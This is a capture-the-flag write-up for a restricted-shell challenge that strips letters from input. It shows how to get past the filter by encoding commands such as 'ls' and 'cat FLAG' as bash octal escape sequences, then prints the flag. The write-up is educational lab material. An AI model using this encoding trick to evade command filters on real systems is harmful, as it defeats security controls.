Gunslinger Joe's private Terminal

Oct 24, 2014 • xorpse

Gunslinger Joe's private Terminal

Description

Author: cutz

Category: Misc

Gunslinger Joe has a pretty bad memory and always forgets the password for his private terminals! That’s why he always uses his username as password but also makes sure that absolutely no one else who knows his name can interact with his secure terminal. Wouldn’t it be super embarrassing for him to prove him wrong?

SSH: gunslinger_joe@wildwildweb.fluxfingers.net

PORT: 1403

Solution

Author: Sam Thomas / xorpse

After logging in and attempting to enter a few commands into the shell, we see that characters in [A-Za-z] are being stripped from the input before being interpreted:

$ ls
$ echo "hello"
: : command not found
$ echo "12345"
: 12345: command not found
$ $?
: 0: command not found

Since digits ([0-9]) are not being stripped, we could try to encode the command using escape sequences – it turns out octal as a number system is perfectly suited for this. The command ls can be encoded as: $'\154'$'\163' and gives:

$ $'\154'$'\163'
FLAG  terminal

Now, it’s simply a matter of performing cat FLAG; which can be encoded as: $'\143'$'\141'$'\164' $'\106'$'\114'$'\101'$'\107'

…and gives us:

$ $'\143'$'\141'$'\164'  $'\106'$'\114'$'\101'$'\107'
flag{joe_thought_youd_suck_at_bash}